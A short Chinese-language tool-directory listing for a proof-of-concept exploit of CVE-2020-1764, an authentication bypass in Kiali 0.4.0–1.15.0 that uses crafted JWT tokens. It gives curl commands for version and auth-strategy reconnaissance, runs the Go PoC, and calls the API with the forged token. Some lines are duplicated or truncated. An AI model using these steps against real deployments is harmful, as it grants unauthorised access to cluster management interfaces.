黑客、渗透测试和网络安全工具,武装您的安全武器库!
CVE-2020-1764 的概念验证漏洞利用程序,针对 Kiali 0.4.0–1.15.0 中的身份验证绕过漏洞,可通过构造的 JWT 令牌实现未授权 API 访问。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
针对Kiali 0.4.0至1.15.0版本使用登录身份验证策略的身份验证绕过PoC(安全公告)
检查版本:curl 'http://<IP>/api
curl 'http://<IP>/api
检查身份验证策略:curl 'http://<IP>/api/auth/info'
curl 'http://<IP>/api/auth/info'
go run ./poc.go
curl 'http://<IP>/api/status' -H "Authorization: Bearer $JWT"